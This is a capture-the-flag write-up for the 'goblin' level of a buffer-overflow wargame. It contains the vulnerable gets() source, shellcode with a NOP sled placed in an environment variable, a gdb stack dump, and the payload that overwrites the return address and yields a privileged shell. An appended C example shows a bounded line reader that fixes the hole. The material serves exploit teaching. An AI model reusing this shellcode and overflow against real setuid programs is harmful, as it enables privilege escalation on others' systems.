BOF Expedition – Level 3 (goblin)

The challenge source is as follows.

/*
 The Lord of the BOF : The Fellowship of the BOF
 - goblin
 - small buffer + stdin
*/

#include <stdio.h>

int main()
{
 char buffer[16];
 gets(buffer);              /* unbounded read from stdin into a 16-byte buffer */
 printf("%s\n", buffer);
 return 0;
}

What differs from the previous level is that the input is not taken from argv but read from stdin with gets(). When the input comes in through gets(), the solution proceeds as follows: the NOP sled and shellcode are placed in the environment variable SH, gdb is used to find where that sled lands on the stack, and the 16-byte buffer plus the 4-byte saved frame pointer are overwritten with 20 bytes before the return address; the trailing cat keeps stdin open so commands can be typed into the resulting shell.

[cobolt@localhost cobolt]$ export SH=`python -c "print '\x90'*100000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` 
[cobolt@localhost cobolt]$ gdb goblin_tmp 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as i386-redhat-linux...
(gdb) b main
Breakpoint 1 at 0x80483fe
(gdb) r
Starting program: /home/cobolt/goblin_tmp 

Breakpoint 1, 0x80483fe in main ()
(gdb) x/32wx $esp
0xbffe7478: 0xbffe7488 0x080483eb 0x08049480 0x08049494
0xbffe7488: 0xbffe74a8 0x400309cb 0x00000001 0xbffe74d4
0xbffe7498: 0xbffe74dc 0x40013868 0x00000001 0x08048350
0xbffe74a8: 0x00000000 0x08048371 0x080483f8 0x00000001
0xbffe74b8: 0xbffe74d4 0x080482bc 0x0804844c 0x4000ae60
0xbffe74c8: 0xbffe74cc 0x40013e90 0x00000001 0xbffe75c3
0xbffe74d8: 0x00000000 0xbffe75db 0xbffe75fd 0xbffe7607
0xbffe74e8: 0xbffe7615 0xbffe7634 0xbffe7643 0xbffe765c
(gdb) 
0xbffe74f8: 0xbffe7678 0xbffe7683 0xbffe7691 0xbffe76d3
0xbffe7508: 0xbffe76e5 0xbffe76fa 0xbffe770a 0xbffe7716
0xbffe7518: 0xbffe7734 0xbffe773f 0xbffffe0c 0xbffffe19
0xbffe7528: 0xbffffe21 0x00000000 0x00000003 0x08048034
0xbffe7538: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffe7548: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffe7558: 0x00000008 0x00000000 0x00000009 0x08048350
0xbffe7568: 0x0000000b 0x000001f6 0x0000000c 0x000001f6
(gdb) 
0xbffe7578: 0x0000000d 0x000001f6 0x0000000e 0x000001f6
0xbffe7588: 0x00000010 0x0febfbff 0x0000000f 0xbffe75be
0xbffe7598: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe75a8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe75b8: 0x00000000 0x36690000 0x2f003638 0x656d6f68
0xbffe75c8: 0x626f632f 0x2f746c6f 0x6c626f67 0x745f6e69
0xbffe75d8: 0x4c00706d 0x4f535345 0x3d4e4550 0x73752f7c
0xbffe75e8: 0x69622f72 0x656c2f6e 0x69707373 0x732e6570
(gdb) 
0xbffe75f8: 0x73252068 0x45535500 0x4d414e52 0x48003d45
0xbffe7608: 0x53545349 0x3d455a49 0x30303031 0x534f4800
0xbffe7618: 0x4d414e54 0x6f6c3d45 0x686c6163 0x2e74736f
0xbffe7628: 0x61636f6c 0x6d6f646c 0x006e6961 0x4e474f4c
0xbffe7638: 0x3d454d41 0x6f626f63 0x5200746c 0x544f4d45
0xbffe7648: 0x534f4845 0x39313d54 0x36312e32 0x31322e38
0xbffe7658: 0x00312e38 0x4c49414d 0x61762f3d 0x70732f72
0xbffe7668: 0x2f6c6f6f 0x6c69616d 0x626f632f 0x00746c6f
(gdb) 
0xbffe7678: 0x4d524554 0x6e696c3d 0x48007875 0x5454534f
0xbffe7688: 0x3d455059 0x36383369 0x54415000 0x752f3d48
0xbffe7698: 0x6c2f7273 0x6c61636f 0x6e69622f 0x69622f3a
0xbffe76a8: 0x752f3a6e 0x622f7273 0x2f3a6e69 0x2f727375
0xbffe76b8: 0x52313158 0x69622f36 0x682f3a6e 0x2f656d6f
0xbffe76c8: 0x6f626f63 0x622f746c 0x48006e69 0x3d454d4f
0xbffe76d8: 0x6d6f682f 0x6f632f65 0x746c6f62 0x504e4900
0xbffe76e8: 0x43525455 0x74652f3d 0x6e692f63 0x72747570
(gdb) 
0xbffe76f8: 0x48530063 0x3d4c4c45 0x6e69622f 0x7361622f
0xbffe7708: 0x53550068 0x633d5245 0x6c6f626f 0x41420074
0xbffe7718: 0x455f4853 0x2f3d564e 0x656d6f68 0x626f632f
0xbffe7728: 0x2f746c6f 0x7361622e 0x00637268 0x474e414c
0xbffe7738: 0x5f6e653d 0x53005355 0x90903d48 0x90909090
0xbffe7748: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7758: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7768: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) 
0xbffe7778: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7788: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7798: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77a8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77b8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77c8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77d8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77e8: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) q
The program is running. Exit anyway? (y or n) y
[cobolt@localhost cobolt]$ (python -c "print 'A'*20 + '\xe8\x77\xfe\xbf'"; cat) | ./goblin 
AAAAAAAAAAAAAAAAAAAA

 id
uid=503(goblin) gid=502(cobolt) egid=503(goblin) groups=502(cobolt)
my-pass
euid = 503
hackers proof
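As an added example (not part of this write-up or the LOB goblin binary): the bounded line reader that closes the hole gets() opens, with the 20 'A's plus 4 address bytes from the session above as a constructed sample input. The names read_line_bounded, demo_line and demo_out are hypothetical; tmpfile() stands in for the stdin pipe.

```c
#include <stdio.h>
#include <string.h>
/* Bounded replacement for the gets(buffer) call in goblin. Reads one line
 * from `in` into buf[cap], always NUL-terminates, and reports whether the
 * line fit. Bytes beyond cap-1 are discarded, so an over-long line cannot
 * reach the saved frame pointer or return address behind the buffer. */
enum read_status { READ_OK = 0, READ_TRUNCATED = 1, READ_EOF = -1 };

enum read_status read_line_bounded(char *buf, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL) {
        if (cap) buf[0] = '\0';
        return READ_EOF;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';            /* whole line fit: drop the newline */
        return READ_OK;
    }
    int c = fgetc(in);
    if (c == EOF || c == '\n')          /* line ended exactly at the buffer */
        return READ_OK;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;                               /* drain the bytes that did not fit */
    return READ_TRUNCATED;
}

char demo_out[16];                      /* same size as goblin's buffer */

/* Runs one constructed stdin line through the bounded reader into demo_out
 * and returns the status; tmpfile() stands in for the pipe used above. */
enum read_status demo_line(const char *line)
{
    FILE *in = tmpfile();
    if (!in) return READ_EOF;
    fwrite(line, 1, strlen(line), in);
    rewind(in);
    enum read_status st = read_line_bounded(demo_out, sizeof demo_out, in);
    fclose(in);
    return st;
}
/* The 20 'A's plus 4 address bytes from the write-up, as a constructed sample. */
#define OVERFLOW_ATTEMPT "AAAAAAAAAAAAAAAAAAAA\xe8\x77\xfe\xbf\n"

int main(void)
{
    enum read_status st = demo_line(OVERFLOW_ATTEMPT);
    printf("%s (status %d)\n", demo_out, st);   /* 15 'A's, status 1 */
    return 0;
}
```

With the bounded reader the 24-byte line is cut at 15 bytes and reported as truncated, so the saved EBP and return address are never overwritten.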
